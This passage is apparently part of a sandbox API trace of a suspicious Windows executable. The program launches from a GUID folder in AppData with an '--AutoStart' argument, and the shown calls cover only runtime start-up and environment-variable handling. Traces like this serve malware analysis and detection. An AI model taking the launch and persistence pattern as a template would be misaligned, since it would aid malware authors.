0x76f5ca24 [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="FlushProcessWriteBuffers") returned 0x76f10b8c [0153.141] GetProcAddress (hModule=0x74eb0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x76fcfde8 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCurrentProcessorNumber") returned 0x76f61e1d [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="GetLogicalProcessorInformation") returned 0x74f44761 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="CreateSymbolicLinkW") returned 0x74f3cd11 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="EnumSystemLocalesEx") returned 0x74f4424f [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="CompareStringEx") returned 0x74f446b1 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="GetDateFormatEx") returned 0x74f56676 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="GetLocaleInfoEx") returned 0x74f44751 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="GetTimeFormatEx") returned 0x74f565f1 [0153.142] GetProcAddress (hModule=0x74eb0000, lpProcName="GetUserDefaultLocaleName") returned 0x74f447c1 [0153.143] GetProcAddress (hModule=0x74eb0000, lpProcName="IsValidLocaleName") returned 0x74f447e1 [0153.143] GetProcAddress (hModule=0x74eb0000, lpProcName="LCMapStringEx") returned 0x74f447f1 [0153.143] GetProcAddress (hModule=0x74eb0000, lpProcName="GetCurrentPackageId") returned 0x0 [0153.143] GetProcAddress (hModule=0x74eb0000, lpProcName="GetTickCount64") returned 0x74edeee0 [0153.143] GetProcAddress (hModule=0x74eb0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0153.143] GetProcAddress (hModule=0x74eb0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0153.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x2dfb00 [0153.143] GetCurrentThreadId () returned 0x4d4 [0153.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2c3a40 [0153.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2dfec8 [0153.150] GetStartupInfoW (in: lpStartupInfo=0x18f768 | out: lpStartupInfo=0x18f768*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0xdb46e524, hStdError=0x44)) [0153.150] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0153.150] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0153.150] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0153.150] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe\" --AutoStart" [0153.151] GetEnvironmentStringsW () returned 0x2e06d0* [0153.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb02) returned 0x2e11e0 [0153.189] FreeEnvironmentStringsW (penv=0x2e06d0) returned 1 [0153.195] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\CUsersGrujaAppDataLocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\3af89e63-1a12-46ae-ba57-0b2d2fa1411a\\cusersgrujaappdatalocalf8dae1c3-7a0a-4e72-953d-2c2978522d0b09b4b7b46aaa241b8e31419b9d71e0b9b1c70991cb1dd544cfb55150ebcb7a72.exe")) returned 0xd0 [0153.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c6) returned 0x2e1cf0 [0153.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x9c) returned 0x2e1ec0 [0153.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d5e00 [0153.196] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6c) returned 0x2e1f68 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6e) returned 0x2e06d0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x78) returned 0x2d1fb0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x62) returned 0x2e0748 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db6f0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d72a8 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x28) returned 0x2db0e8 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1a) returned 0x2df8b8 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x4a) returned 0x2e07b8 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x72) returned 0x2d2030 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db728 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db760 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1c) returned 0x2df8e0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x2e0810 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7c) returned 0x2e08f0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e0978 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3a) returned 0x2d5e48 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x90) returned 0x2e09b8 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2db118 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db798 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e0a50 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d72f8 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e0a90 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d5e90 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x82) returned 0x2e0af0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db7d0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x28) returned 0x2db148 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2df908 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2c) returned 0x2db808 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2e0b80 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e0be0 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db840 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d5ed8 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2e0c40 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2db178 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db878 [0153.197] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x8c) returned 0x2e0ca0 [0153.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e11e0 | out: hHeap=0x2c0000) returned 1 [0153.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2e0d38 [0153.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x80) returned 0x2e1540 [0153.325] GetLastError () returned 0x0 [0153.325] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x220) returned 0x2e15c8 [0153.325] GetLastError () returned 0x0 [0153.325] IsValidCodePage (CodePage=0x4e4) returned 1 [0153.325] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f75c | out: lpCPInfo=0x18f75c) returned 1 [0153.331] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f224 | out: lpCPInfo=0x18f224) returned 1 [0153.338] GetLastError () returned 0x0 [0153.343] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0153.344] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed68, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0153.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f538, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÔåFÛt÷\x18", lpUsedDefaultChar=0x0) returned 256 [0153.344] GetLastError () returned 0x0 [0153.344] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0153.344] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18ed78, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0153.344] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18f438, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÔåFÛt÷\x18", lpUsedDefaultChar=0x0) returned 256 [0153.350] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0153.350] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x431d5b) returned 0x4037ad [0153.396] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1540) returned 0x80 [0153.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0153.410] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1f) returned 0x2df930 [0153.410] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x2df930, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 31 [0153.424] GetLastError () returned 0x0 [0153.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2e17f0 [0153.424] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e17f0) returned 0x4 [0153.424] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e17f0, Size=0x8) returned 0x2e17f0 [0153.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0153.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e1800 [0153.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", cchWideChar=-1, lpMultiByteStr=0x2e1800, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="APPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpUsedDefaultChar=0x0) returned 54 [0153.424] GetLastError () returned 0x0 [0153.430] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e17f0) returned 0x8 [0153.430] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e17f0, Size=0xc) returned 0x2e1840 [0153.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0153.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x37) returned 0x2e1858 [0153.430] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e1858, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0153.430] GetLastError () returned 0x0 [0153.431] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1840) returned 0xc [0153.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1840, Size=0x10) returned 0x2e1840 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0153.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d5f20 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2d5f20, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0153.431] GetLastError () returned 0x0 [0153.431] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1840) returned 0x10 [0153.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1840, Size=0x14) returned 0x2e1898 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0153.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x31) returned 0x2e18b8 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x2e18b8, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0153.431] GetLastError () returned 0x0 [0153.431] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1898) returned 0x14 [0153.431] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2e1898, Size=0x18) returned 0x2e1898 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0153.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x17) returned 0x2e18f8 [0153.431] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x2e18f8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0153.431] GetLastError () returned 0x0 [0153.431] RtlSizeHeap (HeapHandle=0x2c0000, Flags=0x0, MemoryPointer=0x2e1898) returned 0x18 [0153.431] RtlReAllocateHeap 